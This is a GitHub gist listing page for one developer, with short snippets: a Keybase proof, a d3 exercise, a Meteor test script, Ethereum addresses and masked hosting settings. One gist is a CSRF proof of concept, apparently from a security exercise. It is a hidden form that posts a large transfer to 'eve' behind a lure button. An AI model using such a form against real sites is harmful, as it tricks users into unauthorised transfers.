Skip to content

Instantly share code, notes, and snippets.

View schmidsi's full-sized avatar
🦩

Simon Emanuel Schmid schmidsi

🦩
View GitHub Profile
@schmidsi
schmidsi / keybase.md
Created April 27, 2017 16:55
keybase proof

Keybase proof

I hereby claim:

  • I am schmidsi on github.
  • I am schmidsi (https://keybase.io/schmidsi) on keybase.
  • I have a public key ASC9luUDHfp9tpeNfzFN2cQ0Kv1DS0C8GQ0fIyRXLhuUYwo

To claim this, I am signing this object:

@schmidsi
schmidsi / index.html
Last active April 30, 2017 13:43
ivis exercise 03: intro to d3
<!DOCTYPE html>
<meta charset="utf-8">
<style>
body {
margin: 15px;
background-color: #F1F3F3
}
.bar.skill {
fill: #6F257F;
}
@schmidsi
schmidsi / README.md
Last active August 2, 2023 16:45
How we react/redux
@schmidsi
schmidsi / .block
Last active January 12, 2024 00:54
Order Book Visualisation
license: gpl-3.0
@schmidsi
schmidsi / subprocess.js
Last active May 22, 2017 13:08
Simple node.js script that can start meteor and wait until it is loaded to run chimp tests
// Inspired from: https://github.com/xolvio/qualityfaster/blob/master/.scripts/
import { exec } from 'child_process';
const meteorCommand = process.argv[2];
const chimpCommand = process.argv[3];
const meteorProcess = exec(meteorCommand); // 'npm start'
meteorProcess.stdout.pipe(process.stdout);
meteorProcess.stderr.pipe(process.stderr);
<form action="https://krysi-csrf-express.now.sh/transfer" method="POST">
<input type="hidden" name="payee" value="eve" />
<input type="hidden" name="amount" value="1234051234" />
<button type="submit">If you're sexy and you know it, click me ;)</button>
</form>
0x546457bbDdf5e09929399768AB5a9D588Cb0334d
0x6D32657f13e771472BdDCD31DE968de84397b7C6
@schmidsi
schmidsi / galaxy-env-vars.js
Created July 3, 2017 13:17
ENV Vars provided by galaxy.meteor.com
Meteor.settings = {
PrerenderIO: {
token: '*',
prerenderServiceUrl: 'https://service.prerender.io'
},
'galaxy.meteor.com': {
env: {
MONGO_URL: 'mongodb://*',
ROOT_URL: 'https://staging.melonport.com'
}
Array(5).fill().map((item, index) => index);
// [ 0, 1, 2, 3, 4 ]